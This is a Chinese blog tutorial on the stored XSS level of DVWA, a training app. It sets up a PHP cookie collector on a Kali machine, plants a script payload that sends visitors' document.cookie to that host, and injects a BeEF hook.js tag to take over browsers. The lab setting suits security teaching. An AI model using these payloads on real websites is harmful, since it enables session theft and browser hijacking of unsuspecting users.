DVWA闯关XSS(Stored)番外篇

有目标就不怕路远。年轻人.无论你现在身在何方.重要的是你将要向何处去。只有明确的目标才能助你成功。没有目标的航船.任何方向的风对他来说都是逆风。因此,再遥远的旅程,只要有目标.就不怕路远。没有目标,哪来的劲头?一车尔尼雷夫斯基

导读:本篇文章讲解 DVWA闯关XSS(Stored)番外篇,希望对大家有帮助,欢迎收藏,转发!站点地址:www.bmabk.com,来源:原文

为了让实验效果更好一点,这里除了使用靶机(win2008的DVWA)之外,还要使用kali来做进攻者,来收集战果(cookie)

准备工作(手工搭建环境)

1:首先在你的kali上安装web服务
(如果你的web服务无法正常启用,也可以试试升级它)

sudo apt install apache2

2:启动web服务

systemctl start apache2.service

3:确认apache2是运行状态

systemctl status apache2.service

在这里插入图片描述
在这里插入图片描述
4:准备一个文件来接收cookie

sudo vim /var/www/html/cookie_rec.php

内容如下:

<?php
    $cookie=$_GET['cookie'];
    $log=fopen("cookie.txt","a");
    fwrite($log, $cookie . "\n");
    fclose($log);
?>

5:给目录权限,一会让它生成存放cookie的文件

sudo chown -R www-data.www-data /var/www/

6:渗透

<script>window.open('http://192.168.40.129/cookie_rec.php?cookie='+document.cookie)</script>
注:192.168.40.129是kali的ip
如果前面做了存储型XSS,请删干净,或者直接重置DVWA

7:解除长度限制,默认限制长度为50个字符
在这里插入图片描述
你可以现在kali上测试一下,正常情况下浏览器会出一个空白的新页面,这个时候你会发现/var/www/html目录下多了个cookie.txt,里面会记录你的cookie。确认这一点之后记得恢复环境!!!
(由于我测试了多次,所以cookie记录里面有三条记录)
在这里插入图片描述
在这里插入图片描述

渗透

1:在DVWA上植入XSS代码的时候,排个雷,实验没有效果的话,换个浏览器试试,这个跟浏览器的安全策略有关

我kali的火狐浏览器会出现一个弹窗并被拦截,放过那个弹窗即可 √
我物理机的火狐浏览器输入XSS代码时,无任何反应 ×
我物理机的Edge浏览器输入XSS代码时,直接弹到一个新的标签页 √

在这里插入图片描述
2:检查是否收到cookie
在这里插入图片描述

准备工作BeEF

记得重置DVWA的环境

启动apache和BeEF

systemctl start apache2.service
点一下BeEF图标启动BeEF

访问BeEF的web页面

http://192.168.40.129:3000/ui/panel

使用XSS

去靶机上填入BeEF自动生成的一个XSS代码

<script src="http://192.168.40.129:3000/hook.js"></script>

植入木马

考虑到前面使用火狐浏览器不大顺利,这次使用Edge
在这里插入图片描述

收到结果

在这里插入图片描述

扩大战果

因为这是存储型XSS,所以任何人访问DVWA的这个页面都会中招,那么这里就用kali去访问一下页面,只需要kali访问这个页面即可。
在这里插入图片描述
BeEF拿到战果,甚至显示出了kali的虚拟机标识,够智能

192.168.40.131表示它是万恶之源,我们拿到的战果都是因为它(131是DVWA的主机IP)
Edge是谷歌的开源 Chromium 内核重构浏览器
192.168.40.1是VM8网卡的IP

在这里插入图片描述

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/134369.html

(0)
飞熊的头像飞熊bm

相关推荐

发表回复

登录后才能评论
极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!